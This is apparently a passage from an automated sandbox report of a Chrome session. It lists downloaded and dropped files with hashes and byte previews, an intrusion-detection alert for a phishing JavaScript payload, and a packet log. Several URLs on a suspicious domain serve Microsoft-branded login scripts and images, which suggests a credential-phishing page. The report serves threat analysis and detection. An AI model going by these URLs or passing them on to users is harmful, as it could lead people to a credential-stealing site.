                                                                Preview:...........kw.8.(....G37mw...Wl....'..t^.'.O*.%K...#yKr..x.....D.r...Y....<*...@..@......U...........W........a.....rv~5..}.=.(....+...*.w....A%.*~...<....G.7.Ye.....U.Q.'s..2......,|.T...\8Q.Z.^..P?.....@i7...........xT..>..U.......WN}7..p.T".2.......oB.8...,.L.(....WF.)j....bL...'..'4P..........e.`.ZW:.V.........p!z........cL.`zV.t.[.I=7.EO.....xT!d....{..@<{.L#'@...`.i..#.........?.#42...$.....*..cV.dP....A..g\.6...k.w....d.[.>4.I.k...vw..j...q....n.q&=VO..s.>....?x.b:sb......>.ct~..g..<..*..1t.r.>:~ .s.N.07A.r..a.$..,.ZBGg.....+...d...*.-..JP..+..O........z...[=...on.._......~?...vx....c\Xu .$L^.~......d.....G......s..no...".....R..m.c....JT..*#=.*..&..#..F5x....g.=.....$.Z......+....e..S4....R.o..Z.E.T.w.H..j.O.mL.....3k..E..\..E!.....,.'z.;.....2....2..xoo...G..d.\..%lu.a4...l..'..k.}..0`.+H=."@......,S'A..D..&B.\.q.k.Sq...i5BT`'b....z..5@} &.&.....v..............N..g..@O..*....w?....'U....k1=...)Y! )..;.Y.#%......{.K...3.s_oo..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 21
                                                                Category:dropped
                                                                Size (bytes):136
                                                                Entropy (8bit):6.349935175634173
                                                                Encrypted:false
                                                                SSDEEP:3:FttJOzXEWOlY1vWpG3kQDJhjKk4rWDmsAVtxbv8UmRi5wuIhkK5n:XtwrhOlYvWo3kWJhfPKsARbvFmRi5wwS
                                                                MD5:1144D599A02028873EB90CA2F6C909AE
                                                                SHA1:863EF068D59FA677ABF3907E53B0309732569D6F
                                                                SHA-256:0490EDAA8C849D3BFD4D7B91DD0A21735F85381B05B8FB5D050EA76E038DB501
                                                                SHA-512:DB0EDC053BC48E9C1A1FE3BE38866352DDFE16E39C8385FD02687B9D8494C6A94E2B6E108F4C962388D7FCDBAB4399DD62211D267A29F2207A56271C7CF38300
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:............`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^f..U..y......7..J./.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 3651
                                                                Category:downloaded
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.860223690068481
                                                                Encrypted:false
                                                                SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                                                MD5:DF6A7721C242813411CC6950DF40F9B3
                                                                SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                                                SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                                                SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10421), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):10421
                                                                Entropy (8bit):5.520271620503189
                                                                Encrypted:false
                                                                SSDEEP:192:nvz/V1EkHrTdR5k4n6LDCR4VN8yEH/yEjtyMZotZyNLnISSbxs3ReGM6JTC9yg:nDV1EkHrTdR5Hn6nCRSN8yEH/yEjtyMQ
                                                                MD5:C9CE240666A0BF96E98C0723399D7D7F
                                                                SHA1:44AA418184DD6E33FA56CB86A9ABA565B4D0DCCD
                                                                SHA-256:2AE84227809039DB37CB7A6B7BA1458FC8971EED910346903600F6A2F2483480
                                                                SHA-512:8EBE9DEA3C0A4B0595E788123926274F432611A65CCBB5F5CC551B8483AA4C002EF0194D194A72E69CC59EA6A7E8FB218EBB90EE80FEA9AD1E339A1117142F6A
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/sweet-alert.min.js?v=18.01.24
                                                                Preview:!function(w,f){function M(W){var H=n(),J=H.querySelector("h2"),L=H.querySelector("p"),F=H.querySelector("button.cancel"),N=H.querySelector("button.confirm");if(J.innerHTML=k(W.title).split("\n").join("<br>"),L.innerHTML=k(W.text||"").split("\n").join("<br>"),W.text&&r(L),d(H.querySelectorAll(".icon")),W.type){for(var V=!1,U=0;U<v.length;U++){if(W.type===v[U]){V=!0;break}}if(!V){return w.console.error("Unknown alert type: "+W.type),!1}var D=H.querySelector(".icon."+W.type);switch(r(D),W.type){case"success":i(D,"animate"),i(D.querySelector(".tip"),"animateSuccessTip"),i(D.querySelector(".long"),"animateSuccessLong");break;case"error":i(D,"animateErrorIcon"),i(D.querySelector(".x-mark"),"animateXMark");break;case"warning":i(D,"pulseWarning"),i(D.querySelector(".body"),"pulseWarningIns"),i(D.querySelector(".dot"),"pulseWarningIns")}}if(W.imageUrl){var P=H.querySelector(".icon.custom");P.style.backgroundImage="url("+W.imageUrl+")",r(P);var j=80,K=80;if(W.imageSize){var Q=W.imageSize.split("
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:downloaded
                                                                Size (bytes):1077
                                                                Entropy (8bit):4.875026340959771
                                                                Encrypted:false
                                                                SSDEEP:24:QBQOYsFAzFlAaDDDNrBQOYN7FJF6AaOIM:ZOLe7AoX0OCD4An
                                                                MD5:1FD30B5F893B575458219D76A18EA6FB
                                                                SHA1:F6E0EC19CEAD9B459B5719E044D9A05AA0DD44CD
                                                                SHA-256:8AF91AB8523F31C32C53158A41B438652FA8501DEA581B0D3845BC01737DC7FE
                                                                SHA-512:FE51339B0F48414513B4E7BF0AAF158B11DC2F75C21261994317553601874321DB929BD953AF6290831DE9AB31BFF155153909279CCE8782208DAE3D5377569F
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://fonts.googleapis.com/earlyaccess/alefhebrew.css
                                                                Preview:/* . * Alef Hebrew (Hebrew) http://www.google.com/fonts/earlyaccess. */.@font-face {. font-family: 'Alef Hebrew';. font-style: normal;. font-weight: 400;. src: url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Regular.eot);. src: url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Regular.eot?#iefix) format('embedded-opentype'),. url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Regular.woff2) format('woff2'),. url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Regular.woff) format('woff'),. url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Regular.ttf) format('truetype');.}.@font-face {. font-family: 'Alef Hebrew';. font-style: normal;. font-weight: 700;. src: url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Bold.eot);. src: url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Bold.eot?#iefix) format('embedded-opentype'),. url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Bold.woff2) format('woff2'),. url(//fonts.gstatic.com/ea/alefhebrew/v4/Alef-Bold.woff) format('woff'),. u
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 407220
                                                                Category:downloaded
                                                                Size (bytes):116540
                                                                Entropy (8bit):7.997825181124115
                                                                Encrypted:true
                                                                SSDEEP:3072:1Z+nz/877FBfOOStd+6Rp4gLYjQzyrsTvp6iOux:L+2Std+ak7sTp9Oo
                                                                MD5:E9AE5AF7F0BA61B0D613B88AF165C3AE
                                                                SHA1:A82D7ED2A9796DFD5ABDECBDF249483E52A50BE1
                                                                SHA-256:471B9BDE37531CADC717CCFABD8AF1C4F662BEA47D6793072BE9B2D2D4866B34
                                                                SHA-512:5ED38DF69B8F38B37F3B14C5776E21324B009F655DDF0316BE767A259C13AD0BDCCFF5FE772F85F97EFD901BA3C7FE63EA9D3C8F8F9ACF56610D03E14B8332D5
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_41f36656d3c0bb04c90c.js
                                                                Preview:...........}[[.H........-...1 #<$!=.$...{z.'...X..<.pi....Z....,.I.>..L...K....W.....l.._.....r.r....S............`...b.E..7....r#>..~%.+.?..Y..1.*7.7..ie..7.x.+.0..qT.zQ..].ipW1..pT9u...r|j5.~..y.._....\O....W\.D.M..x%.G<..M......A...J...F....`.7..q....F..K.Z#jF..Qq...7...4P.......,.A.7.?}hh.H+....P...C...g.......MD...:..(...0#..b...J....MV.}............q.Us.p.u....c.......w3....X.Gq0..).-U~.E...A..5..v.kT1..Vw....lY..$.g....n.........N..u.{u.....wv..;..8..Ip.F.m...z.F0..7..h.o.'.7.F...b:..ir.....n\.W.9...8.@.j.N`.T....:BG......'h..;......W3w..o0.3...|~9...$......v....i[.a...........q.Z..nX..l[,....<.mZ,..m.%..j.[.s.j.jP.l.x..8...&.5..~..;u....7`#.I...=..wp+......n.1......?.y..~e..&.^7.........|..yc..[..r....O|~W.L3.+d..-q.c7...pj...*.M~.0..x..5p.Y....6..A.,.k..c.{7<Hb{.w.......8iW.D.>.04.[.6v.i..2.#...&.;-.].....3.X0w.H6mZ..A...t..e-.\....MC6.xt`..cu...@_...v....;z'.mV.T/o.i....-...K......\.WSn>B......Hx..%.....W.|......~.6.....K
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):28
                                                                Entropy (8bit):4.307354922057605
                                                                Encrypted:false
                                                                SSDEEP:3:8Kiun9ks:8Kiun2s
                                                                MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                                SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                                SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                                SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCdwxzUJFn9lTEgUN0VtRUhIFDVd69_0h3kcaN3xCwuA=?alt=proto
                                                                Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (7396), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):7396
                                                                Entropy (8bit):5.772062593693759
                                                                Encrypted:false
                                                                SSDEEP:192:WP1V3sMk2YPVHOT8dtI1SplFG5rY1+HmTKf4ocRpVIbRybgMGyxOIq4sU+/oGIkf:WP13g9hnVgykMGyxOIqnv/oGIkUNkIL2
                                                                MD5:9B9656AA0F2CB47AFF116AFB8143202B
                                                                SHA1:AF82F81DDA2BF1CD6FB0CFCF1088D52B035D1632
                                                                SHA-256:4EBB6C412B08438667F6A8ECB1879460EB24C8C4AB03E37B1428B25151DB5E50
                                                                SHA-512:64417F9300ED050F27CE02A09473075580348E648A23AD3142D812BEF8F44CFA8ECB3D2DDB17DE559744436A4644A0A743165372B5D1B9727531F0DF1370A069
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/stats.js?v=18.01.24
                                                                Preview:var mousetracker;var pwTracker;var strguid="";var _uv;jQuery(document).ready(function(){pwTracker=new pwTrack();pwTracker.initTracker();strguid=pwTracker.guidstring});function pwTrack(){this.showPixel=a;this.createguid=c;this.initTracker=d;pwTrack.prototype.guidstring=null;var b=c();this.guidstring=b;function d(){var i=MD5(window.location.origin+window.location.pathname);try{if(get_cookie(i)=="visited"){_uv=0}else{_uv=1;var g=new Date();g.setDate(g.getDate()+30);var k=g.getFullYear();var j=g.getMonth();var f=g.getDate();set_cookie(i,"visited",k,j,f)}}catch(h){_uv=1}a()}function c(){return guid()}function a(){var e="<div style='display:none;'><img src='"+tracker_url;e+="?guid="+b;e+="&op=1";e+="&pid="+escape(page_id);e+="&refer="+escape(document.referrer);e+="&href="+escape(window.location.href);e+="&hostname="+escape(window.location.hostname);e+="&referrer="+escape(document.referrer);e+="&appCodeName="+escape(navigator.appCodeName);e+="&appName="+escape(navigator.appName);e+="&appVersi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 113842
                                                                Category:downloaded
                                                                Size (bytes):35231
                                                                Entropy (8bit):7.993800018692746
                                                                Encrypted:true
                                                                SSDEEP:768:09zC0n659QhQH8d0Lvo5Po6BdO9NzsEs7zzOmSpH3:WzCO67QhQH8d0M5Poh9i7Ptq3
                                                                MD5:6F9D3793B669931BC3AC7593B1D94CE5
                                                                SHA1:0099E57D248621524217E09C324FAC948AD4ACE3
                                                                SHA-256:3A394EF3F83CA965E5BB4DA2CFD2480647E437DD3F026CAAE89DF642D30573AA
                                                                SHA-512:D33D679F614771329251C104581759070561C9A8AB524C3DE78550EF51EB196C07A7274F738148DB48D03FE18C6DB69FD23F8204B725229192E57E4EC1AF4AF4
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4f75990aeef30238698e.js
                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{....F......n......{..(.......m..<...(.Z..t9I..F.^..G..{.....rn.5.s...r.H.... .kt...z.L.[=Ao`.t..|h.=......p.m...M<....D.E.^.........]x[.e>...uv/./..^{....8.z..~.}.-a..E..E. .9....Y.Jw....<].:...Pag...\.......x~.z...n...!.j.y..~u.F....m._0.......(........~.....x..f.|.d...........!0B.(..........((.o...A)....It.].....|r.."..#)....=..Y=..X...]....V..No....X.;.b....[ ..z.....t...N.g5d..._c.....I....l_.l_.."..._oz..^lM....hc..^l....0M..'[.....,...A....7X....O^...y..l.i.f.....lE .GQ=...........y$?.cB.+h..2...n).9.....kb.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (6299), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):6299
                                                                Entropy (8bit):5.299360024788675
                                                                Encrypted:false
                                                                SSDEEP:96:jYfGkLkofJSevfolZyOwe9EkZnlODBC/IPKJyIPwk:jxkLkCJS0f7kZ0D1PKJyG
                                                                MD5:6AD7DD75A7D37D24CDF5BB9042F588DB
                                                                SHA1:16CE7DD6E9D948BEDCDBE5CC793030E1A4BE3F00
                                                                SHA-256:571729B99DC4BBE8C1488E2387EF0DB500A6A6C7887EE28D50C86391AF0C6A55
                                                                SHA-512:8AC05CBEB9471C57D605B7882334268D9126BF0D9C0394A0D53699CDE01B804F1C6DBB84DACBEAB4808A43D49B8166B118432A91AA36689D3F082C426341EAD0
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/swfobject.js?v=18.01.24
                                                                Preview:if(typeof deconcept=="undefined"){var deconcept=new Object()}if(typeof deconcept.util=="undefined"){deconcept.util=new Object()}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object()}deconcept.SWFObject=function(h,w,c,u,q,p,s,t,v,o){if(!document.getElementById){return}this.DETECT_KEY=o?o:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(h){this.setAttribute("swf",h)}if(w){this.setAttribute("id",w)}if(c){this.setAttribute("width",c)}if(u){this.setAttribute("height",u)}if(q){this.setAttribute("version",new deconcept.PlayerVersion(q.toString().split(".")))}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true}if(p){this.addParam("bgcolor",p)}var x=s?s:"high";this.addParam("quality",x);this.setAttribute("useExpressInstall",false);this.setAttrib
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 1592
                                                                Category:dropped
                                                                Size (bytes):621
                                                                Entropy (8bit):7.6770058072183405
                                                                Encrypted:false
                                                                SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                                                SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                                                SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                                                SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1572)
                                                                Category:downloaded
                                                                Size (bytes):23176
                                                                Entropy (8bit):5.320760377206205
                                                                Encrypted:false
                                                                SSDEEP:192:NedB0q4KfqKrbqGIwV4MHP7leA85q1bfqbrbqGIwV4RePq/euaDqPxfqxrbqGIwj:48UqY49f7qY4KFtqY414AqY4d
                                                                MD5:6EBEE786687BCAA64FCB714C20E25FE2
                                                                SHA1:13F0C3BBEAEDA59EBD1D10269437037043C3A9B3
                                                                SHA-256:43FC587D4C7860E824A47A42FC2B758455429AAF36B6EEB270D7CFB6A8975C56
                                                                SHA-512:BDF486B86BB00BB88E495D984FA28D18EF37026DBD3AB5DCC7D60FCCA4181C27414B04A81FCA95D4E0BE8A0E7D6D2FD1E3AB7AB7F065D1B6A0CE4207F8FB2653
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:"https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,300"
                                                                Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style: normal;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (32769)
                                                                Category:downloaded
                                                                Size (bytes):94840
                                                                Entropy (8bit):5.372946098601679
                                                                Encrypted:false
                                                                SSDEEP:1536:8YRKUfAjtledhTmtaFyQHGvCXsedOgRc9izzr4yff8teLvHHEjam7W5X3yzSiLnM:VUb6GvCu09s2o2skAieW
                                                                MD5:B8D64D0BC142B3F670CC0611B0AEBCAE
                                                                SHA1:ABCD2BA13348F178B17141B445BC99F1917D47AF
                                                                SHA-256:47B68DCE8CB6805AD5B3EA4D27AF92A241F4E29A5C12A274C852E4346A0500B4
                                                                SHA-512:A684ABBE37E8047C55C394366B012CC9AE5D682D29D340BC48A37BE1A549AECED72DE6408BEDFED776A14611E6F3374015B236FBF49422B2982EF18125FF47DC
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js
                                                                Preview:/*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3958
                                                                Category:dropped
                                                                Size (bytes):1506
                                                                Entropy (8bit):7.747738029071203
                                                                Encrypted:false
                                                                SSDEEP:24:XaushnKsPhUnid1PFi3kFAEvTl4s99M620mAvaXcutwh2oPRFJqowp+YfOiPuQNS:XahhKMhUifFiU6ELlP96620yNwgMFgo5
                                                                MD5:5F531853F9D471FD8B9DA987E8345529
                                                                SHA1:4600E5BAA3BCADC2AA37C7A55287FC1B3785E75D
                                                                SHA-256:4C73CF41367556364E4D05C9D4B1A7C90653C50EDD2CC10C93C0F395F3FE1CA4
                                                                SHA-512:0D7B7004D9EFCDF8ADDBD717EE18FEBEF99B0FB8959B4F658DED7F517595C4309C4508653A799B4E45BAF57E2BD565D5734B6069E62108BDFC6D1E88D85F26D2
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:............`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"~..7N...O.<y...<M..L_~....I.....wr...7O....o.x..w.7u.l....Yy.....m.zt........./.yu..`..e.u.......GG.5.J.-.e.Y........Rn.g3....-.2?z|W~...h..j;.E...~...O..*k.I...N.e./..>:;.,.].'w..M~.HY,.u^~.Q.^.y3....t^..cCHNW.Uv._.?.O...i..]].......Gi{..?.............O..u..?.h.M.^..z9{......!T...U.HiT.j..G..!D.)h..G...eA...?......~o..~.{..wN.[.Z..yK.....K...AE....Yq.N.......v1..K..X...i....lA.....O..~....7..0..2+.......W_.^..|..7..?.x....>......|w.9i...'.S....y....{..wV..t.j....^._.........8...!|....n.../N_....U.w......{....>...y.........7..6i....Y.....................4L41#qHI..R>!>.............@.....A.L..G..u.Z.y=^-/B...l9+..).f..|7........G&M.g..o...Kb^H..h....m..5..x.{D..n....U.>.....F^.Q./CO..4w....?....z.(7..E..b.......n...bN......O.........j.EV.,o..<.Y.;......gy.hw.......K..,..........[...{t.....9..hw.....<......z...<.,...:.g.9.._..6...l.$
                                                                No static file info

                                                                Download Network PCAP: filteredfull

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2025-04-09T02:18:48.083200+02002857090ETPRO PHISHING JS/PsyduckPockeball Payload Inbound1137.184.178.231443192.168.2.549733TCP
                                                                • Total Packets: 840
                                                                • 443 (HTTPS)
                                                                • 80 (HTTP)
                                                                • 53 (DNS)
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 9, 2025 02:18:13.440917969 CEST49672443192.168.2.5204.79.197.203
                                                                Apr 9, 2025 02:18:15.847065926 CEST49672443192.168.2.5204.79.197.203
                                                                Apr 9, 2025 02:18:20.208209038 CEST49676443192.168.2.520.189.173.14
                                                                Apr 9, 2025 02:18:20.518942118 CEST49676443192.168.2.520.189.173.14
                                                                Apr 9, 2025 02:18:20.659539938 CEST49672443192.168.2.5204.79.197.203
                                                                Apr 9, 2025 02:18:21.128302097 CEST49676443192.168.2.520.189.173.14
                                                                Apr 9, 2025 02:18:22.331435919 CEST49676443192.168.2.520.189.173.14
                                                                Apr 9, 2025 02:18:24.878314018 CEST49676443192.168.2.520.189.173.14
